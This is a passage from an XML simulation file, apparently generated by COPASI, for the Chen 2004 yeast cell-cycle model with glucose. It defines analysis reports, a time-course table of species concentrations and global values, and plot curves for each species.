<Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Problem=Parameter Estimation,Reference=Best Parameters"/>
</Body>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Object=Result"/>
</Footer>
</Report>
<Report key="Report_11" name="Metabolic Control Analysis" taskType="metabolicControlAnalysis" separator="	" precision="6">
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml">
Automatically generated report.
</body>
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Metabolic Control Analysis],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Metabolic Control Analysis],Object=Result"/>
</Footer>
</Report>
<Report key="Report_12" name="Lyapunov Exponents" taskType="lyapunovExponents" separator="	" precision="6">
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml">
Automatically generated report.
</body>
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Lyapunov Exponents],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Lyapunov Exponents],Object=Result"/>
</Footer>
</Report>
<Report key="Report_13" name="Time Scale Separation Analysis" taskType="timeScaleSeparationAnalysis" separator="	" precision="6">
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml">
Automatically generated report.
</body>
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Time Scale Separation Analysis],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Time Scale Separation Analysis],Object=Result"/>
</Footer>
</Report>
<Report key="Report_14" name="Sensitivities" taskType="sensitivities" separator="	" precision="6">
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml">
Automatically generated report.
</body>
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Sensitivities],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Sensitivities],Object=Result"/>
</Footer>
</Report>
<Report key="Report_15" name="Events" taskType="timeCourse" separator="	" precision="7">
<Comment>
A table of time, variable species concentrations, variable compartment volumes, and variable global quantity values.
</Comment>
<Table printTitle="1">
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BCK2],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BUB2],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BUD],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2P],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5P],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC14],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC14T],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC15],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC15i],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC20],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC20i],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6P],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6T],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDH1],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDH1i],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CKIT],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2T],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5T],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN2],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLN3],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[ESP1],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2P],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5P],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[IE],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[IEP],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[LTE1],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MAD2],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MASS],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MCM1],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1P],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1T],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[ORI],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PDS1],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PE],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[PPX],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[RENT],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[RENTP],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SBF],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1P],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1T],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SPN],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SWI5],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SWI5P],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[TEM1GDP],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[TEM1GTP],Reference=Concentration"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mdt],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[D],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mu],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb5],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdb2],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vasbf],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Visbf],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpc1],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpf6],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vacdh],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vicdh],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppnet],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpnet],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdppx],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdpds],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vaiep],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vd2c1],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vd2f6],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppc1],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppf6],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[F],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[1stDivisionTime],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[T0],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Period],Reference=Value"/>
<Object cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[GLUconsumed],Reference=Value"/>
</Table>
</Report>
<Report key="Report_16" name="Linear Noise Approximation" taskType="linearNoiseApproximation" separator="	" precision="6">
<Comment>
Automatically generated report.
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Linear Noise Approximation],Object=Description"/>
</Header>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Linear Noise Approximation],Object=Result"/>
</Footer>
</Report>
</ListOfReports>
<ListOfPlots>
<PlotSpecification name="Concentrations, Volumes, and Global Quantity Values" type="Plot2D" active="1">
<Parameter name="log X" type="bool" value="0"/>
<Parameter name="log Y" type="bool" value="0"/>
<ListOfPlotItems>
<PlotItem name="[BCK2]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BCK2],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[BUB2]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BUB2],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[BUD]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BUD],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[C2]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[C2P]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2P],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[C5]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[C5P]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5P],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDC14]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC14],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDC14T]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC14T],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDC15]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC15],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDC15i]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC15i],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDC20]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC20],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDC20i]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC20i],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDC6]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDC6P]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6P],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDC6T]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6T],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDH1]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDH1],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CDH1i]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDH1i],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CKIT]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CKIT],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CLB2]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CLB2T]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2T],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CLB5]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CLB5T]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5T],Reference=Concentration"/>
</ListOfChannels>
</PlotItem>
<PlotItem name="[CLN2]" type="Curve2D">
<Parameter name="Color" type="string" value="auto"/>
<Parameter name="Line subtype" type="unsignedInteger" value="0"/>
<Parameter name="Line type" type="unsignedInteger" value="0"/>
<Parameter name="Line width" type="unsignedFloat" value="1"/>
<Parameter name="Recording Activity" type="string" value="during"/>
<Parameter name="Symbol subtype" type="unsignedInteger" value="0"/>
<ListOfChannels>
<ChannelSpec cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time"/>
